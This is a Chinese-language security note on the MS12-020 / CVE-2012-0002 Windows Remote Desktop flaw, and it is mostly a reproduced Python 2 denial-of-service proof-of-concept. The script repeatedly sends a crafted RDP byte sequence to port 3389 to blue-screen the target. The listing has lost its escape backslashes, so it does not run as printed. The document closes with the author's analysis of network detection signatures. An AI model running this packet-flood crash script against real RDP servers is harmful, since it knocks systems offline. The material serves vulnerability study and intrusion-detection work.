CVE编号:CVE-2012-0002(对应微软安全公告 MS12-020)
CNNVD编号:CNNVD-201203-241
中文名:3389远程溢出漏洞/Microsoft Windows远程桌面协议代码执行漏洞
原文地址:http://blog.csdn.net/jiayanhui2877/article/details/47025247 ==>含有报文分析和特征提取,如果Buf搞不定,就看这个吧
脚本攻击目标环境:Windows 系统且开放 3389/TCP(远程桌面)端口 ==> 脚本只需能与目标建立 TCP 连接并把 buf 发出去即可;脚本本身只用到 socket/time 模块,是 Python 2 语法(print 语句),运行端不要求是 Windows。
复现环境:XP系统、开启3389、未打补丁含有此漏洞
这是一个二进制(协议解析)层面的漏洞,精华在于对 RDP 连接报文(TPKT / X.224 / T.125 MCS 连接报文)的解析:下面 PoC 自带的注释指出,篡改 MCS 报文中的 MaxChannelIds 字段即可让目标蓝屏。
相对的,msf 中也有对应模块,可以对照阅读其 Ruby 源码。需要注意:msf 里 MS12-020 的模块是 auxiliary(拒绝服务模块 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 和检测模块 auxiliary/scanner/rdp/ms12_020_check),效果是让目标蓝屏,并不是能拿到 shell 的 RCE exploit;下面这个公开 PoC 同样只是 DoS。
# MS12-020 (CVE-2012-0002) RDP "MaxChannelIds" PoC v2 (wireshark version), as published.
# Author's notes: tested on Win XP SP3 (Spanish); reported to work on Win7 / Win 2008.
# Original source: http://115.com/file/be27pff7
#
# What this script does (see the loop at the bottom): open a TCP connection to
# HOST:PORT, send the fixed byte string buf1, close the socket without reading
# any reply, and repeat 1000 times one second apart.  The author's own note on
# the MaxChannelIds line says that value "results in bluescreen", i.e. this is a
# crash (DoS) PoC, not code execution.
#
# NOTE(review): in this transcription the backslash of every "\xNN" escape has
# been lost, so the literals below are plain ASCII text ("x03x00x00x13") rather
# than the bytes the comments describe; the listing is not runnable as printed.
# It is also Python 2 syntax (print statement).
#
# `buf` is built first but never referenced again; only `buf1` is ever sent.
# `sys` is only needed by the commented-out `HOST = sys.argv[1]` line.

import socket
import sys
import time


# --- buf: first packet variant; built but NOT sent by the loop below ---------
buf = ""
buf += "x03x00x00x13"                                      # TPKT header, version 3, length 19 (0x13)
buf += "x0exe0x00x00x00x00x00x01x00x08x00x00x00x00x00"     # ITU-T Rec X.224
buf += "x03x00x01xd6"                                      # TPKT header, version 3, length 470 (0x1d6)
buf += "x02xf0x80"                                         # ITU-T Rec X.224

buf += "x7fx65x82x01x94x04"                                # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf += "x01x01x04x01x01x01x01xff"
buf += "x30x19x02x04x00x00x00x22"   # author's note: this MaxChannelIds value results in a bluescreen after 0x2c head len
buf += "x02x04x00x00x00x02x02x04"
buf += "x00x00x00x00x02x04x00x00"
buf += "x00x01x02x04x00x00x00x00"
buf += "x02x04x00x00x00x01x02x02"
buf += "xffxffx02x04x00x00x00x02"
buf += "x30x19x02x04x00x00x00x01"
buf += "x02x04x00x00x00x01x02x04"
buf += "x00x00x00x01x02x04x00x00"
buf += "x00x01x02x04x00x00x00x00"
buf += "x02x04x00x00x00x01x02x02"
buf += "x04x20x02x04x00x00x00x02"
buf += "x30x1cx02x02xffxffx02x02"
buf += "xfcx17x02x02xffxffx02x04"
buf += "x00x00x00x01x02x04x00x00"
buf += "x00x00x02x04x00x00x00x01"
buf += "x02x02xffxffx02x04x00x00"
buf += "x00x02x04x82x01x33x00x05"
buf += "x00x14x7cx00x01x81x2ax00"
buf += "x08x00x10x00x01xc0x00x44"
buf += "x75x63x61x81x1cx01xc0xd8"
buf += "x00x04x00x08x00x80x02xe0"
buf += "x01x01xcax03xaax09x04x00"
buf += "x00xcex0ex00x00x48x00x4f"
buf += "x00x53x00x54x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x04x00x00"
buf += "x00x00x00x00x00x0cx00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x01xcax01x00x00x00x00"
buf += "x00x10x00x07x00x01x00x30"
buf += "x00x30x00x30x00x30x00x30"
buf += "x00x2dx00x30x00x30x00x30"
buf += "x00x2dx00x30x00x30x00x30"
buf += "x00x30x00x30x00x30x00x30"
buf += "x00x2dx00x30x00x30x00x30"
buf += "x00x30x00x30x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x00x00x00"
buf += "x00x00x00x00x00x04xc0x0c"
buf += "x00x0dx00x00x00x00x00x00"
buf += "x00x02xc0x0cx00x1bx00x00"
buf += "x00x00x00x00x00x03xc0x2c"
buf += "x00x03x00x00x00x72x64x70"
buf += "x64x72x00x00x00x00x00x80"
buf += "x80x63x6cx69x70x72x64x72"
buf += "x00x00x00xa0xc0x72x64x70"
buf += "x73x6ex64x00x00x00x00x00"
buf += "xc0"

buf += "x03x00x00x0c"                                      # TPKT header, version 3, length 12 (0x0c)
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x04x01x00x01x00"                                   # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf += "x03x00x00x08"                                      # TPKT header, version 3, length 8
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x28"                                               # MULTIPOINT-COMM-SERVICE T.125
buf += "x03x00x00x0c"                                      # TPKT header, version 3, length 12
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x38x00x06x03xef"                                   # MULTIPOINT-COMM-SERVICE T.125
buf += "x03x00x00x0c"                                      # TPKT header, version 3, length 12
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x38x00x06x03xeb"                                   # MULTIPOINT-COMM-SERVICE T.125
buf += "x03x00x00x0c"                                      # TPKT header, version 3, length 12
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x38x00x06x03xec"                                   # MULTIPOINT-COMM-SERVICE T.125
buf += "x03x00x00x0c"                                      # TPKT header, version 3, length 12
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x38x00x06x03xed"                                   # MULTIPOINT-COMM-SERVICE T.125
buf += "x03x00x00x0c"                                      # TPKT header, version 3, length 12
buf += "x02xf0x80"                                         # ITU-T Rec X.224
buf += "x38x00x06x03xee"                                   # MULTIPOINT-COMM-SERVICE T.125
buf += "x03x00x00x0b"                                      # TPKT header, version 3, length 11 (0x0b; the original comment said 12)
buf += "x06xd0x00x00x12x34x00"                             # ITU-T Rec X.224


# --- buf1: the variant that is actually sent.  Same packet sequence as buf,
# but differs in the MCS parameter block (0x0a vs 0x02 in the second line after
# the MaxChannelIds line) and in the trailing short packets ------------------
buf1 = ""
buf1 += "x03x00x00x13x0exe0x00x00"   # TPKT (len 19) + X.224 connection request
buf1 += "x00x00x00x01x00x08x00x00"
buf1 += "x00x00x00x03x00x01xd6x02"   # next TPKT (len 470) begins mid-line
buf1 += "xf0x80x7fx65x82x01x94x04"

buf1 += "x01x01x04x01x01x01x01xff"
buf1 += "x30x19x02x04x00x00x00x22"   # MaxChannelIds line, as in buf
buf1 += "x02x04x00x00x00x0ax02x04"   # differs from buf here (0x0a instead of 0x02)
buf1 += "x00x00x00x00x02x04x00x00"
buf1 += "x00x01x02x04x00x00x00x00"
buf1 += "x02x04x00x00x00x01x02x02"
buf1 += "xffxffx02x04x00x00x00x02"
buf1 += "x30x19x02x04x00x00x00x01"
buf1 += "x02x04x00x00x00x01x02x04"
buf1 += "x00x00x00x01x02x04x00x00"
buf1 += "x00x01x02x04x00x00x00x00"
buf1 += "x02x04x00x00x00x01x02x02"
buf1 += "x04x20x02x04x00x00x00x02"
buf1 += "x30x1cx02x02xffxffx02x02"
buf1 += "xfcx17x02x02xffxffx02x04"
buf1 += "x00x00x00x01x02x04x00x00"
buf1 += "x00x00x02x04x00x00x00x01"
buf1 += "x02x02xffxffx02x04x00x00"
buf1 += "x00x02x04x82x01x33x00x05"
buf1 += "x00x14x7cx00x01x81x2ax00"
buf1 += "x08x00x10x00x01xc0x00x44"
buf1 += "x75x63x61x81x1cx01xc0xd8"
buf1 += "x00x04x00x08x00x80x02xe0"
buf1 += "x01x01xcax03xaax09x04x00"
buf1 += "x00xcex0ex00x00x48x00x4f"
buf1 += "x00x53x00x54x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x04x00x00"
buf1 += "x00x00x00x00x00x0cx00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x01xcax01x00x00x00x00"
buf1 += "x00x10x00x07x00x01x00x30"
buf1 += "x00x30x00x30x00x30x00x30"
buf1 += "x00x2dx00x30x00x30x00x30"
buf1 += "x00x2dx00x30x00x30x00x30"
buf1 += "x00x30x00x30x00x30x00x30"
buf1 += "x00x2dx00x30x00x30x00x30"
buf1 += "x00x30x00x30x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x00x00x00"
buf1 += "x00x00x00x00x00x04xc0x0c"
buf1 += "x00x0dx00x00x00x00x00x00"
buf1 += "x00x02xc0x0cx00x1bx00x00"
buf1 += "x00x00x00x00x00x03xc0x2c"
buf1 += "x00x03x00x00x00x72x64x70"
buf1 += "x64x72x00x00x00x00x00x80"
buf1 += "x80x63x6cx69x70x72x64x72"
buf1 += "x00x00x00xa0xc0x72x64x70"
buf1 += "x73x6ex64x00x00x00x00x00"
buf1 += "xc0x03x00x00x0cx02xf0x80"   # end of the big packet, then a 12-byte TPKT
buf1 += "x04x01x00x01x00x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"   # ten 8-byte TPKT packets ending in 0x28
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x08x02xf0x80x28x03x00x00"
buf1 += "x0cx02xf0x80x38x00x06x03"   # 12-byte TPKT packets: x38 x00 x06 x03 <ea|eb|ec|ed|ee|f0|f1|f2|f3>
buf1 += "xeax03x00x00x0cx02xf0x80"
buf1 += "x38x00x06x03xebx03x00x00"
buf1 += "x0cx02xf0x80x38x00x06x03"
buf1 += "xecx03x00x00x0cx02xf0x80"
buf1 += "x38x00x06x03xedx03x00x00"
buf1 += "x0cx02xf0x80x38x00x06x03"
buf1 += "xeex03x00x00x0cx02xf0x80"
buf1 += "x38x00x06x03xf0x03x00x00"
buf1 += "x0cx02xf0x80x38x00x06x03"
buf1 += "xf1x03x00x00x0cx02xf0x80"
buf1 += "x38x00x06x03xf2x03x00x00"
buf1 += "x0cx02xf0x80x38x00x06x03"
buf1 += "xf3x03x00x00x09x02xf0x80"   # final 9-byte TPKT
buf1 += "x21x80"

# Original comment: "buf1 is for win xp, buf2 is for win7/win2003".  No buf2
# exists in this listing; the only other buffer is `buf` above, which is unused.
#HOST = sys.argv[1]
HOST = '172.16.101.173'     # hard-coded target; the argv version is commented out
PORT = 3389

# Send buf1 on a fresh connection once per second, 1000 times.  Nothing is ever
# read back (recv is commented out), so the client cannot tell whether the
# target crashed; the socket is simply closed after the single send().
for i in range(1000):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST,PORT))
    print "sending: %d bytes" % len(buf1)
    s.send(buf1)
    #rec = s.recv(100)
    #print "received: %d bytes" % len(rec)
    s.close()
    time.sleep(1)
由于日志数据没有给全、报文解析不完整,日志中拿不到关键的 Buf 内容,因此无法直接按载荷特征(例如 T.125 报文中异常的 MaxChannelIds 值)做匹配,只能退而求其次用连接层面的特征。
经过测试,目前只提取到两个特征:
1. destPort:3389
2. bytesIn:938
注意这两个特征都很弱:目的端口 3389 会命中所有正常的远程桌面连接;bytesIn=938 只对应这一个 PoC 变种的发包长度(脚本里 buf 和 buf1 的长度本身就不一样,msf 模块发的又是另一种),攻击者改动一个字节数就能绕过,而且该值还可能取决于日志的字节统计口径(是否包含 TCP/IP 头)。更稳妥的是脚本本身暴露出的行为特征:同一来源每秒新建一条到 3389 的 TCP 连接,发送一段固定长度的数据后不读任何响应就立即断开,如此循环上千次。无论采用哪种特征,都需要在大量正常 RDP 流量上验证误报数量和误报率。